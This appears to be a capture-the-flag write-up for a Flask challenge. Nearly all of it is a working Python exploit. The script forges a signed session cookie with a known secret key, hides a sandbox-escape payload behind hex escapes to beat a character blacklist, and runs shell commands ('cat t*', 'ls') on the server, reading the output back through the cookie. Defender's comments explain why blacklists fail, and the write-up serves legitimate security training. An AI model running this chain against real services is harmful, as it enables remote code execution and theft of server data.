baby interdimensional internet
flask, jail escaping, flask cookie

Exploit Python code
import requests
from flask.sessions import SecureCookieSessionInterface
from itsdangerous import URLSafeTimedSerializer
TARGET = 'http://<IP>:<PORT>/'
# Flask's session-signing key.  Whoever holds it can mint a session cookie the
# server accepts as its own, which is why this script needs it.  On the
# defender's side a disclosed key is a full session-integrity compromise and
# has to be rotated, not merely the affected sessions invalidated.
SECRET_KEY = '<SECRET_KEY>'
# Earlier enumeration variant of the same payload: identical escape chain,
# runs `ls` instead of reading the target file.
# PAYLOAD = u"""i=().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']
# i('flask').session['x']=i('os').popen('ls').read()"""
# Code the server is expected to execute: reaches `__import__` through the
# object subclass list (index 59 presumably depends on the target's interpreter
# version and loaded modules, so it is not portable), imports os, runs the
# command and stores its output in the Flask session under 'x' so that it comes
# back in the response's session cookie (read by exec_rce).  This is the raw
# form; encode_payload() applies the filter-evading escapes before it is placed
# in the cookie.
PAYLOAD = u"""i=().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']
i('flask').session['x']=i('os').popen('cat t*').read()"""
class flask_encoding:
    """Encode and decode Flask client-side session cookies with a known SECRET_KEY.

    The serializer is configured with the same salt, key derivation and digest
    method that Flask's own SecureCookieSessionInterface uses, so cookies
    produced here verify on the server exactly like the ones it issues.
    Defender's note: this is the whole reason SECRET_KEY must stay secret —
    session integrity rests on nothing else.
    """

    def __init__(self):
        """Build a URLSafeTimedSerializer mirroring Flask's session interface."""
        interface = SecureCookieSessionInterface()
        self.serializer = URLSafeTimedSerializer(
            SECRET_KEY,
            salt=interface.salt,
            serializer=interface.serializer,
            signer_kwargs={
                'key_derivation': interface.key_derivation,
                'digest_method': interface.digest_method,
            },
        )

    def deserialize(self, cookie_str):
        """Verify *cookie_str*'s signature and return the session dict.

        A cookie that was not signed with SECRET_KEY does not verify;
        itsdangerous raises BadSignature rather than returning anything.
        """
        return self.serializer.loads(cookie_str)

    def serialize(self, cookie_dict):
        """Return *cookie_dict* serialized and signed as a session cookie."""
        return self.serializer.dumps(cookie_dict)
# waf bypass encoding
def encode_payload(payload):
    """Wrap *payload* in an exec statement and hex-escape the blacklisted characters.

    The leading '"a"\\n' line and the triple-quoted ``exec`` wrapper are Python 2
    statement syntax, so this presumably targets a Python 2 interpreter — confirm
    against the challenge source.  Each blacklisted character is replaced by its
    ``\\xNN`` escape as literal text; since the result sits inside a string
    literal on the target, the interpreter decodes the escape back to the
    original character when the wrapper executes.

    Defender's note: this is why a character blacklist in front of exec/eval is
    not a security control — the same value can be spelled in many encodings.
    The mitigation is to never execute user-supplied text, not a longer list.
    """
    payload = u'"a"\nexec """' + payload + u'"""'
    # Presumably the characters the target's filter rejects, mapped to the hex
    # escape that spells each one.
    blacklist = {
        '[': '\\x5b',
        '(': '\\x28',
        '_': '\\x5f',
        '.': '\\x2e'
    }
    # No replacement text contains another blacklisted character, so the
    # iteration order of the dict does not change the result.
    for c,h in blacklist.items():
        if c in payload:
            payload = payload.replace(c, h)
    return payload
def modify_cookie(s):
    """Re-sign the session cookie held by *s* with the two controlled fields set.

    Decodes the server-issued session, sets ``ingredient`` and the encoded
    ``measurements`` payload, signs the dict again with the known SECRET_KEY and
    stores it back on the requests session so the next request carries it.

    Args:
        s: a ``requests.Session`` that already holds a ``session`` cookie.

    Returns:
        ``(s, codec)`` — the same session object, mutated in place, and the
        ``flask_encoding`` instance so the caller can decode the reply.

    Raises:
        KeyError: if *s* has no ``session`` cookie yet.
    """
    codec = flask_encoding()
    session_data = codec.deserialize(s.cookies['session'])
    # The server presumably executes the 'measurements' value and keys on
    # 'ingredient'; its exact handling is not visible from this script.
    session_data['ingredient'] = u'i'
    session_data['measurements'] = encode_payload(PAYLOAD)
    s.cookies['session'] = codec.serialize(session_data)
    return s, codec
def exec_rce(s, f):
    """Send the forged cookie and decode the session cookie the server returns.

    Args:
        s: ``requests.Session`` carrying the re-signed ``session`` cookie.
        f: the ``flask_encoding`` codec that signed it.

    Returns:
        The decoded session dict from the response; the payload's output is
        expected under key ``'x'``.

    Exits with status 1 when the response sets no ``session`` cookie, which
    means the server did not write the session back.
    """
    response = s.get(TARGET)
    try:
        signed = response.cookies['session']
    except KeyError:
        print('Exploit failed, session cookie not found!')
        exit(1)
    else:
        return f.deserialize(signed)
def main():
    """Run the chain: obtain a session, forge it, send it, print the result."""
    session = requests.session()
    # First request only exists to receive a server-issued session cookie.
    session.get(TARGET)
    session, codec = modify_cookie(session)
    leaked = exec_rce(session, codec)
    print(leaked['x'])
# Run the chain only when executed as a script, not when imported.
if __name__ == '__main__':
    main()